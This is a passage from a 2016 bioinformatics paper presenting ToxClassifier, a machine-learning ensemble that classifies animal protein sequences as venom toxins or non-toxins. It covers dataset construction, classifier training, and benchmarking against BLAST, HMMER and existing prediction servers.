UniProtKB/SwissProt database (Bateman et al., 2015). All entries with duplicate sequence identifier or protein sequence were removed, as were all entries also occuring in Positive dataset; final dataset included 47,144 protein sequences. (3) ‘Moderate difficulty’ negative dataset was designed to match highly curated toxin- like proteins with physiological function; it was created by BLASTp searching UniProtKB/SwissProt database with Positive dataset, with e-value cutoff of 1.0e–10. Resulting BLASTp hits were collected and all duplicates (with identical sequence or sequence identifier), and all sequences also present in Positive dataset or Easy dataset were removed, resulting in 8,034 proteins. (4) ‘Hard’ negative dataset was constructed from TrEMBL database (Bairoch & Apweiler, 2000) instead of Swiss-Prot. As with Moderate dataset, it was created from results of BLASTp using Positive dataset as query and TrEMBL as target database. Duplicates and sequences also occurring in Positive, Easy or Moderate datasets were removed for total of 7,403 sequences. All datasets are available for download at https://github.com/rgacesa/ToxClassifier/tree/ master/datasets. Machine learning classifiers, training and testing Models describing protein sequences were constructed as follows: (1) Single Amino acid frequency model (OF): model uses length of sequence and frequency of each amino acid as input features. (2) Amino acid dimer frequency model (BIF): model uses length of sequence, frequency of each amino acid and of each amino acid 2-mer. (3) Naive tox-bits model (NTB): input features for this model are the number of ‘tox-bits’ for each ‘tox-bits’ HMM listed in the ‘tox-bits’ database (Starcevic et al., 2015). (4) Scored ‘tox-bits’ model (STB): STB is a modification of the NTB model, with HMM bit-scores replacing the number of ‘tox-bits’ in each ‘tox-bit’ HMM model. (5) Tri-Blast Simple (TBS) model: TBS uses BLASTp searches against positive (UniProtKB/SwissProt-ToxProt) and two negative control databases (close non-toxins from UniProtKB/SwissProt and non-toxins from TrEMBL); features include bit-score, query length, subject length, query/subject length ratio, query coverage, percentage of iden- tity, percentage of positive matches; features also include amino-acid frequencies. Scores are computed from the ‘best-hit’ in each database, with a BLAST e-value of 1.0e–10. (6) Tri-Blast Enhanced A (TBEa) model: TBEa model is an expanded variant of TBS, with amino dimer frequencies included in the model. Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 3/20 https://peerj.com https://github.com/rgacesa/ToxClassifier/tree/master/datasets https://github.com/rgacesa/ToxClassifier/tree/master/datasets http://dx.doi.org/10.7717/peerj-cs.90 (7) Tri-Blast Enhanced B (TBEb): model is a variation of TBEa, trained on 80% of the input dataset and with a BLAST e-value cut-off value of 1.0e+3 for the detection of similar toxin or non-toxic sequences. Feature extraction and vectorisation was implemented using the Python 2.7 (https://www.python.org/download/releases/2.7/) scripting language, NCBI BLAST+ version 2.2.31 (Camacho et al., 2009), HMMER 3.1b1 (Eddy, 2011), the ‘tox-bit’ HMM profile database (Starcevic et al., 2015) and a set of custom BLAST databases based on UniProtKB/SwissProt-ToxProt, UniProtKB/SwissProt and TrEMBL databases. Vectorization scripts, vectorised data sets and trained models are available for download at https://github.com/rgacesa/ToxClassifier. Support Vector Machine (SVM), Gradient Boosted Machine (GBM) and Generalised Linear Model (GLM) classifiers were trained for each of the models; Classifiers were implemented using the R-programming language, Caret package (http://topepo.github.io/ caret/index.html). The training set for each dataset was selected by random sampling of 75% of the sequences, and combined training sets were used to train the classifiers. Input features were 0-centered and scaled by standard deviation and training was performed with 10 internal bootstraps. Learning curves were constructed for each classifier to evaluate training efficiency and potential overtraining by plotting performance versus number of sequences in training set. Classifiers were tested using those sequences from Positive, Easy, Moderate and Hard datasets not used in training. Performance was evaluated on each of the datasets and on the summary dataset. The following performance measurements were calculated: (1) Number of true positives (TP): number of toxic sequences in dataset correctly predicted as toxins; sequence was considered a toxin if listed in UniProtKB/ToxProt database. (2) Number of true negatives (TN): number of non-toxic sequences in dataset which are correctly predicted as non-toxic (not in UniProtKB/ToxProt database). (3) Number of false positive (FP): number of non-toxic sequences in dataset incorrectly classified as toxins. (4) Number of false negatives (FN): number of toxic sequences in dataset incorrectly classified as non-toxic. (5) Accuracy (ACC): accuracy is calculated as proportion of sequences correctly classified as toxins or non-toxins; ACC = (TP + TN) / (TP + TN + FP + FN). (6) Specificity (SPEC): also called true negative rate, specificity is proportion of correctly predicted non-toxins (true negatives); SPEC = TN / (TN + FP). (7) Sensitivity (SENS): also called true positive rate or recall, sensitivity is proportion of correctly predicted toxins (true positives); SENS = TP/(TP + FN). (8) Balanced accuracy (B.ACC): balanced accuracy is a mean value of specificity and sensitivity; BACC = (SPEC + SENS)/2. (9) Negative predictive value (NPV): proportion of negatives that are true negatives. NPV = TN/(TN + FN). (10) Positive predictive value (PPV): also called Precision, PPV measures proportion of positives which are true positives; PPV = TP/(TP + FP). Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 4/20 https://peerj.com https://www.python.org/download/releases/2.7/ https://github.com/rgacesa/ToxClassifier http://topepo.github.io/caret/index.html http://topepo.github.io/caret/index.html http://dx.doi.org/10.7717/peerj-cs.90 (11) F-Score (F1): F-score is harmonic mean of precision and sensitivity and represents weighted average of precision and recall. It is calculated as F1=2∗TP/(2∗TP+ FP+FN). (12) Matthews’ correlation coefficient (MCC): the MCC value (also known as phi- coefficient) is a measure of correlation between observed and predicted. It is considered balanced measure even for classes with different amounts of positive and negative values; MCC= TP∗TN−FP∗FN√ (TP+FP)∗(TP+FN)∗(TN+FP)∗(TN+FN) (Matthews, 1975; Powers, 2011). Conventional annotation models Annotation models simulating manual annotation were constructed based on BLAST and HMMER, as follows: (1) Naive-BLAST: annotation method is based on the assumption that a sequence is a toxin if a BLAST search against the UniProtKB/SwissProt-ToxProt dataset returns a positive hit at a certain e-value (usually between 1.0e–20 and 1.0e–5). This approach and its variations are commonly encountered in the literature (Sher & Zlotkin, 2009; Schwartz et al., 2015; Liu et al., 2015; Whittington et al., 2010). (2) OneBLAST: this approach classifies a sequence by a single BLAST search against databases including UniProtKB/SwissProt-ToxProt and other ‘toxin-like’ but non-toxic sequences extracted from UniProtKB/SwissProt and TrEMBL databases (combination of Positive, Moderate and Hard datasets). A sequence is classified as a putative toxin if the highest scoring BLAST hit at a selected e-value is from UniProtKB/SwissProt-ToxProt; it is classified as non-toxic if top BLAST hit is not from UniProtKB/SwissProt-ToxProt, or if all BLAST hits are above the selected e-value. (3) TriBLAST: annotation is performed by a variation of OneBLAST, using separate BLAST searches against UniProtKB/SwissProt-ToxProt and two non-toxin databases (for the Moderate and Hard datasets); a sequence is classified as a toxin if the BLAST search against UniProtKB/SwissProt-ToxProt returns a hit below a certain e-value and with a higher score than the searches against the other databases. Variations of this method are commonly used in toxin annotation (Gacesa et al., 2015; Rachamim et al., 2014). (4) hmmerToxBits: this method is a variation of the naive-BLAST, using HMMER package Hmmsearch instead of BLAST, and the database of ‘tox-bits’ HMM models as the target database. A sequence is classified as a toxin if one or more HMMs can be detected within a certain e-value cut-off. (5) hmmerVenom: modification of hmmerToxBits, the method uses HMM profiles extracted by ‘venom’ and ‘toxin’ text search of the Pfam database instead of ‘tox-bit’ HMMs. (6) twinHmmerPfam: a HMMER based variant of TriBLAST approach, this method performs hmmsearches against two HMM databases (toxin/positive HMMs and negative control) and compares bitscores. Sequence is annotated as a toxin if bitscore for toxin HMM database is higher. TwinHmmerPfam toxin HMMs were extracted from Pfam by keyword search for ‘toxin’ and ‘venom,’ while negative control database is comprised from remainder of Pfam. Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 5/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 (7) twinHmmerToxBits: a variation of twinHmmerPfam method, method compares hmmsearch against toxin HMMs and negative control. For this model, positive database is composed from ‘tox-bit’ HMMs derived from Tox-Prot toxins (Starcevic et al., 2015), while negative control is Pfam database from which HMMs containing ‘toxin’ or ‘venom’ keywords were removed. BLAST databases for Naive-BLAST, OneBLAST and TriBLAST were constructed from 75% randomly sampled sequences in Positive, Easy, Moderate and Hard and performance was measured by annotating remainder of data. HMMER based methods were tested with 25% of random sequences from input datasets, using all appropriate HMM models. Database construction and testing was repeated 10 times and results were averaged. ToxClassifier Meta-classifier calibration and testing ToxClassifier meta-classifier was constructed from nine annotation model and classifier combinations (BIF_SVM, BIF_GBM, STB_SVM, STB_GBM, TBS_SVM, TBS_SVM, TBEa_SVM, TBEb_SVM and TBEb_GBM). Each of nine classifiers reports 1 if the input sequence is predicted as toxin or 0 if predicted as non-toxic, for final prediction score of 0 to 9. Datasets used for calibration of meta-classifier were chosen from the set of venomous and non-venomous animals (human Homo sapiens, the house mouse Mus musculus, the Burmese python Python bivittatus, king cobra Ophiophagus hannah, the duck-billed platypus Ornithorhynchus anatinus, the snakelocks sea anemone Anemonia viridis, the starlet sea anemone Nematostella vectensis; and all proteins deposited in the UniProtKB/SwissProt and TrEMBL databases attributed to snakes, spiders, wasps and Conus snails). All sequences were downloaded from UniProtKB database with exception of Python bivittatus which was not available in UniProtKB and was downloaded from NCBI protein database (Wheeler et al., 2003); all data is available at https://github.com/rgacesa/ToxClassifier/tree/master/datasets. Datasets were split into training sets consisting of 75% of data and test sets including remaining 25% of sequences. ToxClassifier meta-classifier was calibrated by evaluating prediction score versus per- formance for each animal training set and for summary dataset constructed by combining animal training datasets with exclusion of Conus snail data, which was dropped due to sus- pected low quality of annotation. Calibrated ToxClassifier, with prediction score 5 or more as cut-off for positive classification, was tested on animal data test sets, and performance measures were compared to OneBLAST, NaiveBLAST models and ClanTox server. Data used for training and testing and all calculated performance metrics are available at https: //github.com/rgacesa/ToxClassifier/tree/master/datasets/toxclassifier_calibration_test. ToxClassifier comparison to other published tools Performance of ClanTox server (Kaplan, Morpurgo & Linial, 2007) was tested on Positive, Easy, Moderate and Hard datasets and on animal data test sets. ToxinPred server (Gupta et al., 2013) was tested on 868 Positive dataset sequences of length up to 30 amino acids (ToxinPred sequence length limit) and on negative dataset composed 30 amino acid or shorter protein sequences randomly selected from UniProt database (5,673 non-duplicate, non-ToxProt sequences). ToxinPred was not tested on animal data due to lack of short Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 6/20 https://peerj.com https://github.com/rgacesa/ToxClassifier/tree/master/datasets https://github.com/rgacesa/ToxClassifier/tree/master/datasets/toxclassifier_calibration_test https://github.com/rgacesa/ToxClassifier/tree/master/datasets/toxclassifier_calibration_test http://dx.doi.org/10.7717/peerj-cs.90 sequences available in these datasets. SpiderP server (Wong et al., 2013) was not tested as service was not available at the time and PredCSF server (Fan et al., 2016) was not tested as it was deemed too specialized and only accepts single sequence as input. User interface The ToxClassifier web service front-end is implemented using HTML 5.1 (https://www. w3.org/html/), JavaScript (https://www.javascript.com/), jQuery (https://jquery.com/), CSS (https://www.w3.org/Style/CSS/), Java 7.0 (https://www.oracle.com/java/index.html) and the Java Server Pages (JSP 2.1) framework (http://www.oracle.com/technetwork/java/ javaee/jsp/index.html). Visualisation is performed using R (https://www.r-project.org/), ggplot2 (http://ggplot2.org/) and R markdown (http://rmarkdown.rstudio.com/) packages. ToxClassifier runs on an Apache Tomcat 8.0 web server (http://tomcat.apache.org/ download-80.cgi), under an Ubuntu Linux 12.04 operating system (http://www. ubuntu.com/). The service is hosted by the Section of Bioinformatics, Faculty of Food Technology and Biotechnology, University of Zagreb, Croatia (http://www.pbf.unizg.hr/ en/departments/department_of_biochemical_engineering/section_for_bioinformatics). RESULTS The accuracy of three individual machine-learning classifiers to predict toxins from proteins having other physiological functions was assessed by training each classifier using seven different annotation models. The learning classifiers were a Support Vector Machine (SVM) and Gradient Boosted Machine (GBM) chosen as high-performing predictors, and a Generalised Linear Model (GLM) regarded as a simple classifier, but with which a baseline could be established that would allow comparison of the performance of the SVM and GBM machines. A detailed description of the annotation models is given in ‘Methods’ section, but briefly the annotation models used the following sequence information from the training set as classifier inputs: either the frequency of amino acids (TBSim) or combinations of two amino-acids (BIF), the presence of absence or ‘tox-bits’ (SToxA), HMM scores for ‘tox-bits’ (SToxB), a selection of BLAST output co-variants (TBEa) or a variation on TBSim and TBEa (TBEb). The training set was constructed by merging 75% of arbitrarily selected sequences from each of the following datasets: 1/ A ‘Positive’ dataset that contained all 8,093 protein sequences deposited in the UniProtKB/SwissProt-ToxProt database of animal venom toxins (Jungo et al., 2012). 2/ An ‘Easy’ dataset composed of 47,144 random, non-duplicate sequences from UniProtKB/SwissProt database (Bateman et al., 2015). 3/ A ‘Moderate’ dataset comprised of 8,034 unique sequences from the manually curated UniProtKB/SwissProt database considered to be non-toxic but with homology to toxin proteins in UniProtKB/SwissProt-ToxProt. 4/ A ‘Hard’ dataset that included 7,403 non- duplicate sequences extracted from the computer annotated TrEMBL (Bairoch & Apweiler, 2000) database, also considered to be non-toxic but with homology to animal venom toxins in UniProtKB/SwissProt-ToxProt. All training was performed using 10 internal bootstrap cross-validations on the training set, and learning curves showing the accuracy of predictions versus the number of sequences Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 7/20 https://peerj.com https://www.w3.org/html/ https://www.w3.org/html/ https://www.javascript.com/ https://jquery.com/ https://www.w3.org/Style/CSS/ https://www.oracle.com/java/index.html http://www.oracle.com/technetwork/java/javaee/jsp/index.html http://www.oracle.com/technetwork/java/javaee/jsp/index.html https://www.r-project.org/ http://ggplot2.org/ http://rmarkdown.rstudio.com/ http://tomcat.apache.org/download-80.cgi http://tomcat.apache.org/download-80.cgi http://www.ubuntu.com/ http://www.ubuntu.com/ http://www.pbf.unizg.hr/en/departments/department_of_biochemical_engineering/section_for_bioinformatics http://www.pbf.unizg.hr/en/departments/department_of_biochemical_engineering/section_for_bioinformatics http://dx.doi.org/10.7717/peerj-cs.90 in the training sets were constructed, thereby allowing a comparative evaluation of training efficiency (Fig. S1). The trained classifiers were then tested for prediction accuracy using the remaining 25% of sequences not included in the training set. Performance values were calculated to give an overall comparative classification of protein sequences as toxins or non-toxins (Table 1). By comparing learning curves (Fig. S1) and accuracy of predictions (Table 1), 9 of the annotation model and classifier combinations were chosen to construct the ‘ToxClassifier’ ensemble. The trained classifiers were: BIF_SVM, BIF_GBM, STB_SVM, STB_GBM, TBS_SVM, TBS_SVM, TBEa_SVM, TBEb_SVM and TBEb_GBM. These classifiers all gave excellent accuracy scores to predict toxins from the Positive dataset (range 0.82–0.96) and non-toxin proteins from the Easy, Moderate and Hard datasets (range 0.92–1.00). No GLM classifiers were included in the ensemble because prediction accuracies were considerably lower when compared with SVM and GBM machines. Classifiers using NTB and OF annotation models were also abandoned in favour of better performing STB and BIF models. Furthermore, the TBEa_GBM model consistently underperformed compared to the TBE_SVM model and was excluded, giving an odd number of classifiers in the ensemble, thereby avoiding a ‘tied vote’ scenario when the outputs were interpreted collectively. The prediction accuracy of the trained machine learning classifiers was next compared to more conventional annotation methods based on sequence alignment, to determine if machine learning predictions were superior or inferior to well established and accepted bioinformatics tools. A detailed description of the annotation models based on these bioinformatics tools is given in ‘Methods.’ Briefly, simple predictions were made by taking the best-hit from BLAST comparisons between a query sequence and the UniProtKB/SwissProt-ToxProt database (naiveBLAST method), or the best-hit following a HMMER hmmsearch comparison between a query sequence and either existing HMM models for toxin protein families in the Pfam database (hmmerVenom model), or our own ‘tox-bits’ HMM models (hmmerToxbits classifier). More sophisticated annotation models also used BLAST or HMMER searches, but the best-hit was extracted following simultaneous comparisons between the query sequence and multiple datasets. These sophisticated annotation models are also described in ‘Methods’, but briefly these models were constructed from sequence information extracted from either UniProtKB/SwissProt- ToxProt sequences supplemented with additional toxin-like sequences from the UniProtKB/SwissProt and TrEMBL databases, or UniProtKB/SwissProt-ToxProt sequences supplemented with non-toxin sequences from the ‘Moderate’ and ‘Hard’ datasets used to train the machine classifiers. Training and test sets were analogous in design and execution to the machine classifier learning, with 75% of sequence information used to construct the BLAST and HMMER databases and the remaining 25% of data used to evaluate performance. Prediction accuracy measures for each query sequence using each of the bioinformatics models were repeated 10 times to give a final balanced accuracy value. Accuracy measure calculations are described in ‘Methods’. A range of sequence-alignment scoring was also tested to select the lowest BLAST and HMMER cut-off scores that gave the most precise toxin annotation. This value was 1.0e-20 for both BLAST and HMMER searches (Fig. S2). Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90/supp-1 http://dx.doi.org/10.7717/peerj-cs.90/supp-1 http://dx.doi.org/10.7717/peerj-cs.90/supp-2 http://dx.doi.org/10.7717/peerj-cs.90 Table 1 Prediction accuracy on positive and negative datasets, as well as range of measurements calculated for all test data, and described in detail in ‘Methods.’ An- notation models used as classifier inputs either: the frequency of amino acids (TBSim) or combinations of two amino-acids (BIF); the presence of absence or ‘Tox-Bits’ (SToxA); HMM scores for ‘ToxBits’ (SToxB); a selection of BLAST output co-variants (TBEa); a variation on TBSim and TBEa (TBEb). Classifier Learning Machines used were: Gradient Boosted (GBM), Support Vector (SVM) and Generalised Linear Model (GLM). The datasets were a ‘Positive’ control containing only validated animal tox- ins, an ‘Easy’ dataset composed of non-toxin sequences, a ‘Moderate’ dataset comprising curated non-toxin sequences but with homology to ‘Positive’ sequences, and a ‘Hard’ dataset that included all sequences from the ‘Moderate’ dataset, together with un-curated sequences also with homology to ‘Positive’ sequences. Classification scores for: Test set summary Annotation model Classifier Accuracy (Positive toxin dataset) Accuracy (Easy non-toxin dataset) Accuracy (Moderate non-toxin dataset) Accuracy (Hard non-toxin dataset) PPV NPV Sens. Spec. F1-value MCC GBM 0.80 0.99 0.98 0.92 0.80 0.98 0.84 0.97 0.82 0.80 SVM 0.80 1.00 0.98 0.94 0.80 0.99 0.91 0.97 0.85 0.84TBSim GLM 0.55 0.99 0.96 0.84 0.55 0.97 0.69 0.94 0.61 0.57 GBM 0.83 1.00 0.98 0.94 0.83 0.99 0.92 0.98 0.87 0.86 SVM 0.89 1.00 0.98 0.96 0.89 0.99 0.94 0.99 0.91 0.90BIF GLM 0.71 0.99 0.99 0.91 0.71 0.98 0.82 0.96 0.76 0.74 GVM 0.64 1.00 0.98 0.94 0.64 0.99 0.90 0.96 0.75 0.73 SToxA SVM 0.84 1.00 0.96 0.91 0.84 0.98 0.87 0.98 0.86 0.84 GBM 0.75 1.00 1.00 0.93 0.75 0.99 0.92 0.97 0.83 0.84 SVM 0.85 1.00 0.99 0.92 0.85 0.99 0.91 0.98 0.88 0.81SToxB GLM 0.03 1.00 0.99 0.99 0.03 1.00 0.61 0.89 0.06 0.12 GBM 0.88 1.00 1.00 0.99 0.88 1.00 0.99 0.98 0.93 0.93 SVM 0.93 1.00 1.00 0.97 0.93 1.00 0.97 0.99 0.95 0.94TBEa GLM 0.96 1.00 1.00 0.94 0.96 0.99 0.95 0.99 0.95 0.95 GBM 0.82 1.00 1.00 1.00 0.82 1.00 1.00 0.98 0.90 0.90 SVM 0.96 1.00 1.00 0.97 0.96 1.00 0.97 0.99 0.97 0.96TBEb GLM 0.93 1.00 1.00 0.99 0.93 1.00 0.99 0.99 0.96 0.95 G acesa etal. (2016),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.90 9/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 Machine learning classifiers were also evaluated against currently available published tools for toxin prediction and annotation; Animal toxin prediction server ClanTox (Kaplan, Morpurgo & Linial, 2007) was benchmarked using Positive, East, Moderate and Hard datasets and summary of these datasets. As ToxinPred (Gupta et al., 2013) tools predict only small peptide toxins, it was tested using a subset of Positive dataset with sequences no longer than 30 amino acids (868 sequences) and separate negative dataset composed of 5,673 random short proteins from UniProtKB database. SpiderP (Wong et al., 2013) was not benchmarked as the server no longer seems publically available. Finally, PredCSF (Fan et al., 2016) is a conotoxin-specific tool and was deemed not comparable to general annotation tools; it also only allows single sequence input, making it unsuitable for large scale testing. Final performance measures compared between the different tools are listed in Table 2. Testing of sequence-alignment based annotation models (Table 2) demonstrated that the simplistic methods (naiveBLAST, hmmerToxBits and hmmerVenom) gave high prediction accuracies for sequences in the Easy dataset (ranging from 0.95 for hmmerVenom to 0.99 for naiveBLAST), but underperformed in annotation of the physiological toxin-like sequences in the Moderate and Hard datasets (accuracies ranging from 0.74 to 0.83 for Moderate and 0.07 to 0.23 for Hard dataset (the poor performance here, also evinced by the low F1 and MCC scores)). More sophisticated BLAST-based methods (oneBLAST and triBLAST) gave very high prediction accuracy scores (0.93–0.999) for sequences in the Easy and Moderate datasets, but somewhat lower performance on sequences in the Positive and Hard datasets (0.86–0.90). Pfam-based twinHMMER gave the highest accuracy prediction for non-toxin sequences, but underperformed compared to the other annotation models against sequences in the positive toxin dataset (accuracy 0.56). The ‘tox-bits’ based variant accurately predicted sequences in the Easy and Moderate datasets (accuracy 0.85–0.999), but suffered from a high false positive rate when sequences in the Hard dataset were analysed (accuracy 0.44). When compared to machine learning-based methods, even the most accurate of the sequence alignment-based models (oneBLAST and triBLAST) were surpassed by the majority of the machine learning based classifiers, especially by TBEa and TBEb models (SVM and GBM variants), which gave the highest accuracy of prediction for sequences in all test datasets. All prediction methods showed higher performance for negative prediction (predicting non-toxin as non-toxin) compared to positive prediction (correctly predicting toxin as toxic), with Specificity (Spec) and Negative Prediction Value (NPV) significantly higher than Sensitivity (Sens) and Positive Prediction Value (PPV). Each of the 9 machine learning classifiers used in the ‘ToxClassifier’ ensemble gives a simple bit (1 or 0) value as output to predict whether the likely biological activity of the input sequence is as a toxin (1), or has a non-toxic (0) physiological role and scores are summed into final prediction score ranging from 0 to 9. Evaluation of this final prediction score was performed on test sets obtained from randomly sampling 75% of sequences in the published annotated genomes from a selection of venomous animals (king cobra Ophiophagus hannah, the duck-billed platypus Ornithorhynchus anatinus, the snakelocks sea anemone Anemonia viridis, the starlet sea anemone Nematostella vectensis; and all proteins deposited in the UniProtKB/SwissProt and TrEMBL databases attributed to snakes, Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 Table 2 Performance for selected annotation models and published toxin prediction tools. Prediction accuracy is listed for positive and negative datasets and mea- surements are also shown for summary of all test data. ToxinPred server, marked with star and displayed in italic, was tested with short protein sequences only. Annota- tion models were constructed from sequence information extracted from either: BLAST (naiveBLAST), ‘tox-bits’ HMM (hmmerToxBits) or Pfam HMM (hmmerVenom) comparisons with the UniProtKB/SwissProt-ToxProt database; or BLAST (oneBLAST), ‘tox-bits’ HMM (twinHmmerPfam) or Pfam HMM (twinHmmerPfam) com- parisons with the UniProtKB/SwissProt-ToxProt sequences supplemented with additional toxin-like sequences from the UniProtKB/SwissProt and TrEMBL databases; or BLAST (triBLAST) comparisons with the UniProtKB/SwissProt-ToxProt sequences supplemented with non-toxin sequences from the ‘Moderate’ and ‘Hard’ datasets used to train the machine classifiers. The datasets were a ‘Positive’ control containing only validated animal toxins, an ‘Easy’ dataset composed of non-toxin sequences, a ‘Moderate’ dataset comprising curated non-toxin sequences but with homology to ‘Positive’ sequences, and a ‘Hard’ dataset that included all sequences from the ‘Moder- ate’ dataset, together with un-curated sequences also with homology to ‘Positive’ sequences. Classification scores for: Test set summary Annotation model Tool Accuracy (Positive toxin dataset) Accuracy (Easy non-toxin dataset) Accuracy (Moderate non-toxin dataset) Accuracy (Hard non-toxin dataset) PPV NPV Sens. Spec. F1-value MCC naiveBLAST BLAST 0.90 0.99 0.83 0.07 0.90 0.86 0.46 0.99 0.60 0.58 oneBLAST BLAST 0.86 1.00 0.98 0.90 0.86 0.99 0.89 0.98 0.87 0.86 triBLAST BLAST 0.87 0.99 0.93 0.87 0.87 0.97 0.78 0.98 0.82 0.80 hmmerToxBits HMMER 0.91 0.99 0.80 0.19 0.91 0.87 0.48 0.99 0.63 0.60 hmmerVenom HMMER 0.65 0.95 0.74 0.23 0.65 0.84 0.34 0.95 0.45 0.38 twinHmmerPfam HMMER 0.56 0.99 0.98 0.91 0.56 0.98 0.78 0.95 0.65 0.62 twinHmmerToxBits HMMER 0.85 1.00 0.93 0.44 0.85 0.92 0.59 0.98 0.70 0.67 ClanTox server ML 0.66 0.99 0.93 0.73 0.66 0.95 0.65 0.96 0.66 0.61 ToxinPred server* ML 0.55 0.98 N/A N/A 0.55 0.98 0.82 0.93 0.66 0.63 G acesa etal. (2016),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.90 11/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 spiders, wasps and Conus snails) and other animals considered to be non-venomous (human Homo sapiens, the house mouse Mus musculus and the Burmese python Python bivittatus). Calibration was performed by assessing the performance measures of the Toxclassifier ensemble relative to prediction score; calibration curves for summary of all animal genome data are presented in Fig. 1. When the average correct annotation of all input sequences for all genomes was calculated, a combined score from five out of the nine classifiers giving correct classification provided a good balance between the detection of toxins and the filtering of non-toxins. Hence, a calibration for the ToxClassifier ensemble was possible where an input sequence giving a combined score of >6 would be considered a likely toxin, a combined score of <3 would be regarded as non-toxic, while an input sequence presenting with a score 4 or 5 would suggest a potential toxin, but would require manual evaluation using additional tools, for example, InterProScan (Zdobnov & Apweiler, 2001). Performance of calibrated ‘ToxClassifier’ meta-classifier was evaluated on a test set comprising 25% of the animal genome data not used for calibration; these results were compared to naiveBLAST and OneBLAST conventional methods and to ClanTox server for animal toxin prediction (Kaplan, Morpurgo & Linial, 2007). Performance measurements are reported in Table 3 and comparison of F1-scores and MCC values across all datasets is presented in Fig. 2; Figs. S3/A and S3/B. Finally, the ‘ToxClassifier’ was assessed in a blinded experiment that used as input a set of protein sequences derived from the venom gland transcriptome of the Amazonian rain forest pit viper Bothrops atrox (Data S1). The sequences had been annotated using standard methods and manually inspected, with the biological activities of some also being authenticated experimentally. The results of the ‘ToxClassifier’ predictions matched with the expert annotation (Table 4). DISCUSSION The continued decline in proteomics sequencing costs over recent years has led to an explosion in venomics data characterising the toxic peptide and protein components in many venomous animals (Kaas & Craik, 2015). However, there is currently no widely accepted and standard method for functional annotation of toxins from these data sources, leading to inconsistent estimates for the number of toxins in the venom of the same animal. For example, the venom of the duck-billed platypus Ornithorhynchus anatinus has only 6 toxins listed following manual annotation in the latest release of the UniProtKB/SwissProt- ToxProt database (11th May 2016), yet 107 putative toxins were identified by a simple pair-wise BLASTp search using venom gland transcriptome sequences as input to search the UniProtKB/SwissProt ToxProt database (Jungo et al., 2012). In addition to separate homology searching methods to interpret the same data, many venomics projects now also include different manual filtering steps as part of the annotation process (Rachamim et al., 2014; Gacesa et al., 2015), exacerbating the problem of results verification. In this study, a selection of machine learning-based classifiers implementing a range of BLAST and HMMER-based annotation models were trained on datasets of known toxins, protein sequences assumed to be non-toxic but with homology to known toxins, and predicted proteins encoded in the genome, transcriptome or proteome of a range of Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90/supp-4 http://dx.doi.org/10.7717/peerj-cs.90/supp-4 http://dx.doi.org/10.7717/peerj-cs.90/supp-3 http://dx.doi.org/10.7717/peerj-cs.90 Figure 1 Calibration curves used to select final prediction scores for ToxClassifier ensemble. Each of performance measures, described in detail in Methods, is shown for ToxClassifier prediction with toxin prediction cut-off values 1–9. Dotted green line shows trends of prediction measurement with increase in ToxClassifier cut-off value and final cut-off value implemented in calibrated ToxClassifier is highlighted with blue line. venomous and non-venomous animals. A comparison between the results presented in Tables 1–3 demonstrated that the majority of the machine learning methods consistently out-performed standard bioinformatics approaches of functional annotation. Interestingly, all tested methods demonstrated higher performance for negative prediction (classification of non-toxic sequences) compared to positive classification (prediction of toxic sequences as toxins). These results demonstrate that differentiating between physiological toxin-like proteins and actual toxins is more difficult then prediction of random proteins as non-toxic, which is to be expected considering the similarity and common origin of many toxins and toxin-like sequences (Fry, 2005; Chang & Duda, 2012; Hargreaves et al., 2014). As such, it is important to consider balanced performance measurements when assessing toxin classifiers, with scores such as F1-score and MCC value (Matthews, 1975; Powers, 2011) providing Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 Table 3 ToxClassifier calibrated meta-classifier, Test set results compared to oneBLAST, naiveBLAST and ClanTox annotation methods. Table lists comparison of classification performance for calibrated ToxClassifier to BLAST based annotation models and ClanTox toxin prediction server. All tests were conducted test dataset not used in calibration of ToxClassifier. Classification performance of ToxClassifier meta-classifier, compared to BLAST based methods and ClanTox server Annotation model Tool Accuracy Positive prediction value Negative prediction value Sensitivity Specificity F1-value MCC value naiveBLAST BLAST 0.976 0.294 0.998 0.857 0.977 0.438 0.494 oneBLAST BLAST 0.994 0.660 1.000 0.951 0.995 0.779 0.790 ClanTox server ML-based 0.947 0.209 1.000 0.954 0.976 0.342 0.440 ToxClassifier ML-based 0.997 0.825 1.000 0.967 0.998 0.890 0.892 Figure 2 Comparison between selected toxin prediction tools for all animal test datasets. Calibrated ToxClassifier, with positive prediction cutoff 5, is shown by green bar, ClanTox prediction server is displayed in orange, oneBLAST prediction performance in red and naiveBLAST in blue. F1- value and Matthews’ correlation coefficient are displayed for each of test sets and for summary of all data with exclusion of conus snail proteins. Gacesa et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.90 14/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.90 Table 4 Results of expert manual annotation to ToxClassifier annotation for set of novel proteins from venom gland transcriptome of Bothrops atrox snake. Sequence annotation Test sample ‘ToxClassifier’ Standard annotation Test 01 Potential toxin BPP precursor—Toxin Test 02 Potential toxin Crisp—Toxin Test 03 Toxin CTL—Toxin Test 04 Toxin CTL—Toxin Test 05 Potential toxin Hyaluronidase—Toxin Test 06 Potential toxin Kunitz –like sequence—Probably a toxin Test 07 Toxin LAAO—Toxin Test 08 Not a toxin Nucleotidase—Probably not a toxin Test 09 Not a toxin Phosphodiesterase— Probably not a toxin Test 10 Toxin PLA2—Toxin Test 11 Toxin SVMP class PI—Toxin Test 12 Toxin SVMP class PII—Toxin Test 13 Toxin SVMP class PIII—Toxin Test 14 Toxin SVSP—Toxin Test 